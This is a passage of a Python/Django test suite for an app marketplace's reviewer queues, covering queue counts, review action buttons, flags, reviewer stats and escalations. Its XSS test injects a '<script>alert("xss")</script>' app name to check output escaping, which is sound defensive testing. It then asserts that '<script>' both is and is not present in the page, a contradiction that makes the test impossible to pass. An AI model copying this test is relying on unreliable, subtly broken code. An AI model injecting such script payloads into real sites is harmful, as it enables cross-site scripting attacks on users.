v = version_factory(addon=app,
version='2.1',
file_kw={'status': amo.STATUS_PENDING})
v.update(deleted=True)
def test_route_reviewer(self):
# App reviewers go to apps home.
req = amo.tests.req_factory_factory(
reverse('reviewers'),
user=UserProfile.objects.get(username='editor'))
r = route_reviewer(req)
self.assert3xx(r, reverse('reviewers.home'))
def test_progress_pending(self):
self.apps[0].latest_version.update(nomination=self.days_ago(1))
self.apps[1].latest_version.update(nomination=self.days_ago(8))
self.apps[2].latest_version.update(nomination=self.days_ago(15))
counts, percentages = _progress()
eq_(counts['pending']['week'], 1)
eq_(counts['pending']['new'], 1)
eq_(counts['pending']['old'], 1)
eq_(counts['pending']['med'], 1)
self.assertAlmostEqual(percentages['pending']['new'], 33.333333333333)
self.assertAlmostEqual(percentages['pending']['old'], 33.333333333333)
self.assertAlmostEqual(percentages['pending']['med'], 33.333333333333)
def test_progress_rereview(self):
rq = RereviewQueue.objects.create(addon=self.apps[0])
rq.update(created=self.days_ago(8))
rq = RereviewQueue.objects.create(addon=self.apps[1])
rq.update(created=self.days_ago(15))
counts, percentages = _progress()
eq_(counts['rereview']['week'], 1)
eq_(counts['rereview']['new'], 1)
eq_(counts['rereview']['old'], 1)
eq_(counts['rereview']['med'], 1)
self.assertAlmostEqual(percentages['rereview']['new'], 33.333333333333)
self.assertAlmostEqual(percentages['rereview']['old'], 33.333333333333)
self.assertAlmostEqual(percentages['rereview']['med'], 33.333333333333)
def test_progress_updated(self):
extra_app = app_factory(name='Jackalope',
status=amo.STATUS_PUBLIC,
is_packaged=True,
created=self.days_ago(35))
version_factory(addon=extra_app,
file_kw={'status': amo.STATUS_PENDING},
created=self.days_ago(25),
nomination=self.days_ago(8))
extra_app = app_factory(name='Jackrabbit',
status=amo.STATUS_PUBLIC,
is_packaged=True,
created=self.days_ago(35))
version_factory(addon=extra_app,
file_kw={'status': amo.STATUS_PENDING},
created=self.days_ago(25),
nomination=self.days_ago(25))
counts, percentages = _progress()
eq_(counts['updates']['week'], 1)
eq_(counts['updates']['new'], 1)
eq_(counts['updates']['old'], 1)
eq_(counts['updates']['med'], 1)
self.assertAlmostEqual(percentages['updates']['new'], 33.333333333333)
self.assertAlmostEqual(percentages['updates']['old'], 33.333333333333)
self.assertAlmostEqual(percentages['updates']['med'], 33.333333333333)
def test_stats_waiting(self):
self.apps[0].latest_version.update(nomination=self.days_ago(1))
self.apps[1].latest_version.update(nomination=self.days_ago(5))
self.apps[2].latest_version.update(nomination=self.days_ago(15))
self.packaged_app.update(created=self.days_ago(1))
doc = pq(self.client.get(self.url).content)
anchors = doc('.editor-stats-title a')
eq_(anchors.eq(0).text(), '3 Pending App Reviews')
eq_(anchors.eq(1).text(), '1 Re-review')
eq_(anchors.eq(2).text(), '1 Update Review')
divs = doc('.editor-stats-table > div')
# Pending review.
eq_(divs.eq(0).text(), '2 unreviewed app submissions this week.')
# Re-reviews.
eq_(divs.eq(2).text(), '1 unreviewed app submission this week.')
# Update review.
eq_(divs.eq(4).text(), '1 unreviewed app submission this week.')
# Maths.
# Pending review.
eq_(doc('.waiting_new').eq(0).attr('title')[-3:], '33%')
eq_(doc('.waiting_med').eq(0).attr('title')[-3:], '33%')
eq_(doc('.waiting_old').eq(0).attr('title')[-3:], '33%')
# Re-reviews.
eq_(doc('.waiting_new').eq(1).attr('title')[-4:], '100%')
eq_(doc('.waiting_med').eq(1).attr('title')[-3:], ' 0%')
eq_(doc('.waiting_old').eq(1).attr('title')[-3:], ' 0%')
# Update review.
eq_(doc('.waiting_new').eq(2).attr('title')[-4:], '100%')
eq_(doc('.waiting_med').eq(2).attr('title')[-3:], ' 0%')
eq_(doc('.waiting_old').eq(2).attr('title')[-3:], ' 0%')
def test_reviewer_leaders(self):
reviewers = UserProfile.objects.all()[:2]
# 1st user reviews 2, 2nd user only 1.
users = cycle(reviewers)
for app in self.apps:
amo.log(amo.LOG.APPROVE_VERSION, app, app.current_version,
user=users.next(), details={'comments': 'hawt'})
doc = pq(self.client.get(self.url).content.decode('utf-8'))
# Top Reviews.
table = doc('#editors-stats .editor-stats-table').eq(0)
eq_(table.find('td').eq(0).text(), reviewers[0].name)
eq_(table.find('td').eq(1).text(), u'2')
eq_(table.find('td').eq(2).text(), reviewers[1].name)
eq_(table.find('td').eq(3).text(), u'1')
# Top Reviews this month.
table = doc('#editors-stats .editor-stats-table').eq(1)
eq_(table.find('td').eq(0).text(), reviewers[0].name)
eq_(table.find('td').eq(1).text(), u'2')
eq_(table.find('td').eq(2).text(), reviewers[1].name)
eq_(table.find('td').eq(3).text(), u'1')
class FlagsMixin(object):
def test_flag_packaged_app(self):
self.apps[0].update(is_packaged=True)
eq_(self.apps[0].is_packaged, True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
td = pq(res.content)('#addon-queue tbody tr td.flags').eq(0)
flag = td('div.sprite-reviewer-packaged-app')
eq_(flag.length, 1)
def test_flag_premium_app(self):
self.apps[0].update(premium_type=amo.ADDON_PREMIUM)
eq_(self.apps[0].is_premium(), True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
flags = tds('div.sprite-reviewer-premium')
eq_(flags.length, 1)
def test_flag_free_inapp_app(self):
self.apps[0].update(premium_type=amo.ADDON_FREE_INAPP)
res = self.client.get(self.url)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
eq_(tds('div.sprite-reviewer-premium.inapp.free').length, 1)
def test_flag_premium_inapp_app(self):
self.apps[0].update(premium_type=amo.ADDON_PREMIUM_INAPP)
res = self.client.get(self.url)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
eq_(tds('div.sprite-reviewer-premium.inapp').length, 1)
def test_flag_info(self):
self.apps[0].current_version.update(has_info_request=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
flags = tds('div.sprite-reviewer-info')
eq_(flags.length, 1)
def test_flag_comment(self):
self.apps[0].current_version.update(has_editor_comment=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
flags = tds('div.sprite-reviewer-editor')
eq_(flags.length, 1)
class XSSMixin(object):
def test_xss_in_queue(self):
a = self.apps[0]
a.name = '<script>alert("xss")</script>'
a.save()
res = self.client.get(self.url)
eq_(res.status_code, 200)
tbody = pq(res.content)('#addon-queue tbody').html()
assert '<script>' in tbody
assert '<script>' not in tbody
class TestAppQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
XSSMixin):
fixtures = ['base/users']
def setUp(self):
self.apps = [app_factory(name='XXX',
status=amo.STATUS_PENDING,
version_kw={'nomination': self.days_ago(2)},
file_kw={'status': amo.STATUS_PENDING}),
app_factory(name='YYY',
status=amo.STATUS_PENDING,
version_kw={'nomination': self.days_ago(1)},
file_kw={'status': amo.STATUS_PENDING}),
app_factory(name='ZZZ')]
self.apps[0].update(created=self.days_ago(2))
self.apps[1].update(created=self.days_ago(1))
RereviewQueue.objects.create(addon=self.apps[2])
self.login_as_editor()
self.url = reverse('reviewers.apps.queue_pending')
def review_url(self, app):
return reverse('reviewers.apps.review', args=[app.app_slug])
def test_queue_viewing_ping(self):
eq_(self.client.post(reverse('editors.queue_viewing')).status_code,
200)
def test_template_links(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
apps = Webapp.objects.pending().order_by('created')
expected = [
(unicode(apps[0].name), self.review_url(apps[0])),
(unicode(apps[1].name), self.review_url(apps[1])),
]
check_links(expected, links, verify=False)
def test_action_buttons_pending(self):
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Reject', 'reject'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_rejected(self):
# Check action buttons for a previously rejected app.
self.apps[0].update(status=amo.STATUS_REJECTED)
self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
@mock.patch('versions.models.Version.is_privileged', True)
def test_action_buttons_privileged_cantreview(self):
self.apps[0].update(is_packaged=True)
self.apps[0].latest_version.files.update(status=amo.STATUS_PENDING)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
@mock.patch('versions.models.Version.is_privileged', True)
def test_action_buttons_privileged_canreview(self):
self.login_as_senior_reviewer()
self.apps[0].update(is_packaged=True)
self.apps[0].latest_version.files.update(status=amo.STATUS_PENDING)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Reject', 'reject'),
(u'Disable app', 'disable'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_devices(self):
AddonDeviceType.objects.create(addon=self.apps[0], device_type=1)
AddonDeviceType.objects.create(addon=self.apps[0], device_type=2)
r = self.client.get(self.url)
eq_(r.status_code, 200)
tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(5)')
eq_(tds('ul li:not(.unavailable)').length, 2)
def test_payments(self):
self.apps[0].update(premium_type=amo.ADDON_PREMIUM)
self.apps[1].update(premium_type=amo.ADDON_FREE_INAPP)
r = self.client.get(self.url)
eq_(r.status_code, 200)
tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(6)')
eq_(tds.eq(0).text(),
unicode(amo.ADDON_PREMIUM_TYPES[amo.ADDON_PREMIUM]))
eq_(tds.eq(1).text(),
unicode(amo.ADDON_PREMIUM_TYPES[amo.ADDON_FREE_INAPP]))
def test_invalid_page(self):
r = self.client.get(self.url, {'page': 999})
eq_(r.status_code, 200)
eq_(r.context['pager'].number, 1)
def test_queue_count(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (2)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
def test_queue_count_senior_reviewer(self):
self.login_as_senior_reviewer()
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (2)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_escalated_not_in_queue(self):
self.login_as_senior_reviewer()
EscalationQueue.objects.create(addon=self.apps[0])
res = self.client.get(self.url)
# self.apps[2] is not pending so doesn't show up either.
eq_([a.app for a in res.context['addons']], [self.apps[1]])
doc = pq(res.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (1)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_incomplete_no_in_queue(self):
# Test waffle-less.
[app.update(status=amo.STATUS_NULL) for app in self.apps]
req = req_factory_factory(self.url,
user=UserProfile.objects.get(username='editor'))
doc = pq(queue_apps(req).content)
assert not doc('#addon-queue tbody tr').length
class TestRegionQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
XSSMixin):
fixtures = ['base/users']
def setUp(self):
self.apps = [app_factory(name='WWW',
status=amo.STATUS_PUBLIC),
app_factory(name='XXX',
status=amo.STATUS_PUBLIC_WAITING),
app_factory(name='YYY',
status=amo.STATUS_PUBLIC),
app_factory(name='ZZZ',
status=amo.STATUS_PENDING)]
# WWW and XXX are the only ones actually requested to be public.
self.apps[0].geodata.update(region_cn_status=amo.STATUS_PENDING,
region_cn_nominated=self.days_ago(2))
self.apps[1].geodata.update(region_cn_status=amo.STATUS_PENDING,
region_cn_nominated=self.days_ago(1))
self.apps[2].geodata.update(region_cn_status=amo.STATUS_PUBLIC)
self.user = UserProfile.objects.get(username='editor')
self.grant_permission(self.user, 'Apps:ReviewRegionCN')
self.login_as_editor()
self.url = reverse('reviewers.apps.queue_region',
args=[mkt.regions.CN.slug])
def test_template_links(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
links = pq(r.content)('.regional-queue tbody tr td:first-child a')
apps = Webapp.objects.pending_in_region('cn').order_by(
'_geodata__region_cn_nominated')
src = '?src=queue-region-cn'
expected = [
(unicode(apps[0].name), apps[0].get_url_path() + src),
(unicode(apps[1].name), apps[1].get_url_path() + src),
]
check_links(expected, links, verify=False)
def test_escalated_not_in_queue(self):
self.login_as_senior_reviewer()
self.apps[0].escalationqueue_set.create()
res = self.client.get(self.url)
eq_([a.app for a in res.context['addons']], [self.apps[1]])
@mock.patch('versions.models.Version.is_privileged', False)
class TestRereviewQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
XSSMixin):
fixtures = ['base/users']
def setUp(self):
self.apps = [app_factory(name='XXX'),
app_factory(name='YYY'),
app_factory(name='ZZZ')]
RereviewQueue.objects.create(addon=self.apps[0]).update(
created=self.days_ago(5))
RereviewQueue.objects.create(addon=self.apps[1]).update(
created=self.days_ago(3))
RereviewQueue.objects.create(addon=self.apps[2]).update(
created=self.days_ago(1))
self.apps[0].update(created=self.days_ago(5))
self.apps[1].update(created=self.days_ago(3))
self.apps[2].update(created=self.days_ago(1))
self.login_as_editor()
self.url = reverse('reviewers.apps.queue_rereview')
def review_url(self, app):
return reverse('reviewers.apps.review', args=[app.app_slug])
def test_template_links(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
apps = [rq.addon for rq in
RereviewQueue.objects.all().order_by('created')]
expected = [
(unicode(apps[0].name), self.review_url(apps[0])),
(unicode(apps[1].name), self.review_url(apps[1])),
(unicode(apps[2].name), self.review_url(apps[2])),
]
check_links(expected, links, verify=False)
def test_waiting_time(self):
"""Check objects show queue objects' created."""
r = self.client.get(self.url)
waiting_times = [wait.attrib['isotime'] for wait in
pq(r.content)('td time')]
expected_waiting_times = [
isotime(app.rereviewqueue_set.all()[0].created)
for app in self.apps]
self.assertSetEqual(expected_waiting_times, waiting_times)
def test_action_buttons_public_senior_reviewer(self):
self.login_as_senior_reviewer()
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Reject', 'reject'),
(u'Disable app', 'disable'),
(u'Clear Re-review', 'clear_rereview'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_public(self):
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Reject', 'reject'),
(u'Clear Re-review', 'clear_rereview'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_reject(self):
self.apps[0].update(status=amo.STATUS_REJECTED)
self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Clear Re-review', 'clear_rereview'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_invalid_page(self):
r = self.client.get(self.url, {'page': 999})
eq_(r.status_code, 200)
eq_(r.context['pager'].number, 1)
def test_queue_count(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (3)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
def test_queue_count_senior_reviewer(self):
self.login_as_senior_reviewer()
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (3)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_escalated_not_in_queue(self):
self.login_as_senior_reviewer()
EscalationQueue.objects.create(addon=self.apps[0])
res = self.client.get(self.url)
self.assertSetEqual([a.app for a in res.context['addons']],
self.apps[1:])
doc = pq(res.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (2)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_addon_deleted(self):
app = self.apps[0]
app.delete()
eq_(RereviewQueue.objects.filter(addon=app).exists(), False)
@mock.patch('versions.models.Version.is_privileged', False)
class TestUpdateQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
XSSMixin):
fixtures = ['base/users']
def setUp(self):
app1 = app_factory(is_packaged=True, name='XXX',
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': self.days_ago(2)})
app2 = app_factory(is_packaged=True, name='YYY',
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': self.days_ago(2)})
version_factory(addon=app1, version='1.1', created=self.days_ago(1),
nomination=self.days_ago(1),
file_kw={'status': amo.STATUS_PENDING})
version_factory(addon=app2, version='1.1', created=self.days_ago(1),
nomination=self.days_ago(1),
file_kw={'status': amo.STATUS_PENDING})
self.apps = list(Webapp.objects.order_by('id'))
self.login_as_editor()
self.url = reverse('reviewers.apps.queue_updates')
def review_url(self, app):
return reverse('reviewers.apps.review', args=[app.app_slug])
def test_template_links(self):
self.apps[0].versions.latest().update(nomination=self.days_ago(2))
self.apps[1].versions.latest().update(nomination=self.days_ago(1))
r = self.client.get(self.url)
eq_(r.status_code, 200)
links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
expected = [
(unicode(self.apps[0].name), self.review_url(self.apps[0])),
(unicode(self.apps[1].name), self.review_url(self.apps[1])),
]
check_links(expected, links, verify=False)
def test_action_buttons_public_senior_reviewer(self):
self.apps[0].versions.latest().files.update(status=amo.STATUS_PUBLIC)
self.login_as_senior_reviewer()
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Reject', 'reject'),
(u'Disable app', 'disable'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_public(self):
self.apps[0].versions.latest().files.update(status=amo.STATUS_PUBLIC)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Reject', 'reject'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_reject(self):
self.apps[0].versions.latest().files.update(status=amo.STATUS_DISABLED)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Escalate', 'escalate'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_invalid_page(self):
r = self.client.get(self.url, {'page': 999})
eq_(r.status_code, 200)
eq_(r.context['pager'].number, 1)
def test_queue_count(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (2)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
def test_queue_count_senior_reviewer(self):
self.login_as_senior_reviewer()
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (2)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_escalated_not_in_queue(self):
self.login_as_senior_reviewer()
EscalationQueue.objects.create(addon=self.apps[0])
res = self.client.get(self.url)
eq_([a.app for a in res.context['addons']], self.apps[1:])
doc = pq(res.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (1)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_order(self):
self.apps[0].update(created=self.days_ago(10))
self.apps[1].update(created=self.days_ago(5))
self.apps[0].versions.latest().update(nomination=self.days_ago(1))
self.apps[1].versions.latest().update(nomination=self.days_ago(4))
res = self.client.get(self.url)
apps = list(res.context['addons'])
eq_(apps[0].app, self.apps[1])
eq_(apps[1].app, self.apps[0])
def test_only_updates_in_queue(self):
# Add new packaged app, which should only show up in the pending queue.
app = app_factory(is_packaged=True, name='ZZZ',
status=amo.STATUS_PENDING,
version_kw={'version': '1.0'},
file_kw={'status': amo.STATUS_PENDING})
res = self.client.get(self.url)
apps = [a.app for a in res.context['addons']]
assert app not in apps, (
'Unexpected: Found a new packaged app in the updates queue.')
eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (2)')
def test_public_waiting_update_in_queue(self):
app = app_factory(is_packaged=True, name='YYY',
status=amo.STATUS_PUBLIC_WAITING,
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': self.days_ago(2)})
File.objects.filter(version__addon=app).update(status=app.status)
version_factory(addon=app, version='1.1', created=self.days_ago(1),
nomination=self.days_ago(1),
file_kw={'status': amo.STATUS_PENDING})
res = self.client.get(self.url)
apps = [a.app for a in res.context['addons']]
assert app in apps
eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (3)')
def test_update_queue_with_empty_nomination(self):
app = app_factory(is_packaged=True, name='YYY',
status=amo.STATUS_NULL,
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': None})
first_version = app.latest_version
version_factory(addon=app, version='1.1', created=self.days_ago(1),
nomination=None,
file_kw={'status': amo.STATUS_PENDING})
# Now that we have a version with nomination=None, reset app status.
app.update(status=amo.STATUS_PUBLIC_WAITING)
File.objects.filter(version=first_version).update(status=app.status)
# Safeguard: we /really/ want to test with nomination=None.
eq_(app.latest_version.reload().nomination, None)
res = self.client.get(self.url)
apps = [a.app for a in res.context['addons']]
assert app in apps
eq_(pq(res.content)('.tabnav li a:eq(2)').text(), u'Updates (3)')
def test_deleted_version_not_in_queue(self):
"""
This tests that an app with a prior pending version that got
deleted doesn't trigger the app to remain in the review queue.
"""
app = self.apps[0]
# File is PENDING and delete current version.
old_ver = app.versions.order_by('id')[0]
old_ver.files.latest().update(status=amo.STATUS_PENDING)
old_ver.delete()
# "Approve" the app.
app.versions.latest().files.latest().update(status=amo.STATUS_PUBLIC)
eq_(app.reload().status, amo.STATUS_PUBLIC)
res = self.client.get(self.url)
eq_(res.status_code, 200)
# Verify that our app has 2 versions.
eq_(Version.with_deleted.filter(addon=app).count(), 2)
# Verify the apps in the context are what we expect.
doc = pq(res.content)
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (1)')
apps = [a.app for a in res.context['addons']]
ok_(app not in apps)
ok_(self.apps[1] in apps)
class TestDeviceQueue(AppReviewerTest, AccessMixin):
fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
'user_999')
def setUp(self):
self.app1 = app_factory(name='XXX',
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': self.days_ago(2)})
self.app1.versions.latest().features.update(has_sms=True)
self.app2 = app_factory(name='YYY',
version_kw={'version': '1.0',
'created': self.days_ago(2),
'nomination': self.days_ago(2)})
self.app2.versions.latest().features.update(has_mp3=True)
self.app1.update(status=amo.STATUS_PENDING)
self.app2.update(status=amo.STATUS_PENDING)
self.apps = list(Webapp.objects.order_by('id'))
self.login_as_editor()
self.url = reverse('reviewers.apps.queue_device')
def test_no_queue_if_no_pro(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
ok_('queue_device' not in res.context['queue_counts'])
eq_(res.context['addons'], [])
def test_queue_filters(self):
"Test queue filters out apps we don't support."
pro = FeatureProfile(sms=True).to_signature()
res = self.client.get(self.url, {'pro': pro})
eq_(res.status_code, 200)
eq_(res.context['queue_counts']['device'], 1)
apps = [a.app for a in res.context['addons']]
ok_(self.app1 in apps)
ok_(self.app2 not in apps)
@mock.patch('versions.models.Version.is_privileged', False)
class TestEscalationQueue(AppReviewerTest, AccessMixin, FlagsMixin,
SearchMixin, XSSMixin):
fixtures = ['base/users']
def setUp(self):
self.apps = [app_factory(name='XXX'),
app_factory(name='YYY'),
app_factory(name='ZZZ')]
EscalationQueue.objects.create(addon=self.apps[0]).update(
created=self.days_ago(5))
EscalationQueue.objects.create(addon=self.apps[1]).update(
created=self.days_ago(3))
EscalationQueue.objects.create(addon=self.apps[2]).update(
created=self.days_ago(1))
self.apps[0].update(created=self.days_ago(5))
self.apps[1].update(created=self.days_ago(3))
self.apps[2].update(created=self.days_ago(1))
self.login_as_senior_reviewer()
self.url = reverse('reviewers.apps.queue_escalated')
def review_url(self, app):
return reverse('reviewers.apps.review', args=[app.app_slug])
def test_flag_blocked(self):
# Blocklisted apps should only be in the update queue, so this flag
# check is here rather than in FlagsMixin.
self.apps[0].update(status=amo.STATUS_BLOCKED)
res = self.client.get(self.url)
eq_(res.status_code, 200)
tds = pq(res.content)('#addon-queue tbody tr td.flags')
flags = tds('div.sprite-reviewer-blocked')
eq_(flags.length, 1)
def test_no_access_regular_reviewer(self):
# Since setUp added a new group, remove all groups and start over.
user = UserProfile.objects.get(email='[email protected]')
GroupUser.objects.filter(user=user).delete()
self.grant_permission(user, 'Apps:Review')
res = self.client.get(self.url)
eq_(res.status_code, 403)
def test_template_links(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
apps = [rq.addon for rq in
EscalationQueue.objects.all().order_by('addon__created')]
expected = [
(unicode(apps[0].name), self.review_url(apps[0])),
(unicode(apps[1].name), self.review_url(apps[1])),
(unicode(apps[2].name), self.review_url(apps[2])),
]
check_links(expected, links, verify=False)
def test_waiting_time(self):
"""Check objects show queue objects' created."""
r = self.client.get(self.url)
waiting_times = [wait.attrib['isotime'] for wait in
pq(r.content)('td time')]
expected_waiting_times = [
isotime(app.escalationqueue_set.all()[0].created)
for app in self.apps]
self.assertSetEqual(expected_waiting_times, waiting_times)
def test_action_buttons_public(self):
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Reject', 'reject'),
(u'Disable app', 'disable'),
(u'Clear Escalation', 'clear_escalation'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_action_buttons_reject(self):
self.apps[0].update(status=amo.STATUS_REJECTED)
self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
r = self.client.get(self.review_url(self.apps[0]))
eq_(r.status_code, 200)
actions = pq(r.content)('#review-actions input')
expected = [
(u'Push to public', 'public'),
(u'Disable app', 'disable'),
(u'Clear Escalation', 'clear_escalation'),
(u'Request more information', 'info'),
(u'Comment', 'comment'),
]
self.check_actions(expected, actions)
def test_invalid_page(self):
r = self.client.get(self.url, {'page': 999})
eq_(r.status_code, 200)
eq_(r.context['pager'].number, 1)
def test_queue_count(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (3)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
def test_abuse(self):
AbuseReport.objects.create(addon=self.apps[0], message='!@#$')
r = self.client.get(self.url)
eq_(r.status_code, 200)
tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(7)')
eq_(tds.eq(0).text(), '1')
def test_addon_deleted(self):
app = self.apps[0]
app.delete()
